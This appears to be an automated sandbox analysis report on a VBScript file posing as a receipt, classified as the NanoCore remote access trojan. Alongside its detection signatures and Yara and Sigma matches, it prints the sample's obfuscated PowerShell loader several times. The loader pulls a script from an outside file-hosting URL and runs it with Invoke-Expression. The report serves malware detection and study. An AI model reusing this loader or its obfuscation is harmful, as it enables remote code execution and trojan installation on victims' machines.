Loading ...

Play interactive tourEdit tour

Windows Analysis Report 16 Items receipt.vbs

Overview

General Information

Sample Name:16 Items receipt.vbs
Analysis ID:483191
MD5:373e8c4787077ca8568bbe9a9508f9ef
SHA1:fa5913ab89e08bc5aadf1da9c5765a94fe7a5f77
SHA256:0c962d7d9bf5e6ddab50449102e1d549f8133fd09067a036982d19a76ab28499
Tags:NanoCoreRATvbs
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Detected Nanocore Rat
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
Sigma detected: CrackMapExec PowerShell Obfuscation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sigma detected: Encoded PowerShell Command Line
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6468 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\16 Items receipt.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6616 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 2548 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
16 Items receipt.vbsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x30:$s1: POwerSheLL

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Run\New.vbsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x30:$s1: POwerSheLL

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.432999714.0000020EAE009000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x95e0:$s1: POwerSheLL
00000001.00000003.431972357.0000020EAE005000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xd5e0:$s1: POwerSheLL
  • 0x17d88:$s1: POwerSheLL
  • 0x1ae58:$s1: POwerSheLL
  • 0x24f88:$s1: POwerSheLL
  • 0x27ee8:$s1: POwerSheLL
  • 0x29678:$s1: POwerSheLL
00000001.00000002.435172148.0000020EAFE40000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x118:$s1: POwerSheLL
00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
  • 0x1ac2:$a: NanoCore
  • 0x1ae7:$a: NanoCore
  • 0x1b40:$a: NanoCore
  • 0x11cdd:$a: NanoCore
  • 0x11d03:$a: NanoCore
  • 0x11d5f:$a: NanoCore
  • 0x1ebb4:$a: NanoCore
  • 0x1ec0d:$a: NanoCore
  • 0x1ec40:$a: NanoCore
  • 0x1ee6c:$a: NanoCore
  • 0x1eee8:$a: NanoCore
  • 0x1f501:$a: NanoCore
  • 0x1f64a:$a: NanoCore
  • 0x1fb1e:$a: NanoCore
  • 0x1fe05:$a: NanoCore
  • 0x1fe1c:$a: NanoCore
  • 0x231a5:$a: NanoCore
  • 0x2455f:$a: NanoCore
  • 0x245a9:$a: NanoCore
  • 0x25203:$a: NanoCore
  • 0x2a7e8:$a: NanoCore
00000001.00000003.433096509.0000020EAE01D000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2e58:$s1: POwerSheLL
  • 0xcf88:$s1: POwerSheLL
Click to see the 11 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
20.3.aspnet_compiler.exe.3df61b7.2.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x3831:$x1: NanoCore.ClientPluginHost
  • 0x386a:$x2: IClientNetworkHost
20.3.aspnet_compiler.exe.3df61b7.2.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x3831:$x2: NanoCore.ClientPluginHost
  • 0x394c:$s4: PipeCreated
  • 0x384b:$s5: IClientLoggingHost
20.3.aspnet_compiler.exe.3ddc15e.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x6da5:$x1: NanoCore.ClientPluginHost
  • 0x6dd2:$x2: IClientNetworkHost
20.3.aspnet_compiler.exe.3ddc15e.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x6da5:$x2: NanoCore.ClientPluginHost
  • 0x7d74:$s2: FileCommand
  • 0xc776:$s4: PipeCreated
  • 0x6dbf:$s5: IClientLoggingHost
20.3.aspnet_compiler.exe.3df0789.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x16e3:$x1: NanoCore.ClientPluginHost
  • 0x6dd6:$x1: NanoCore.ClientPluginHost
  • 0xd05f:$x1: NanoCore.ClientPluginHost
  • 0x1766e:$x1: NanoCore.ClientPluginHost
  • 0x21a99:$x1: NanoCore.ClientPluginHost
  • 0x2ca76:$x1: NanoCore.ClientPluginHost
  • 0x38818:$x1: NanoCore.ClientPluginHost
  • 0x5d71c:$x1: NanoCore.ClientPluginHost
  • 0x6cb5c:$x1: NanoCore.ClientPluginHost
  • 0x171c:$x2: IClientNetworkHost
  • 0xd098:$x2: IClientNetworkHost
  • 0x177cb:$x2: IClientNetworkHost
  • 0x21ad2:$x2: IClientNetworkHost
  • 0x2ca90:$x2: IClientNetworkHost
  • 0x38832:$x2: IClientNetworkHost
  • 0x5d736:$x2: IClientNetworkHost
  • 0x6cb99:$x2: IClientNetworkHost
Click to see the 7 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

barindex
Sigma detected: CrackMapExec PowerShell ObfuscationShow sources
Source: Process startedAuthor: Thomas Patzke: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli
Sigma detected: Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spli
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X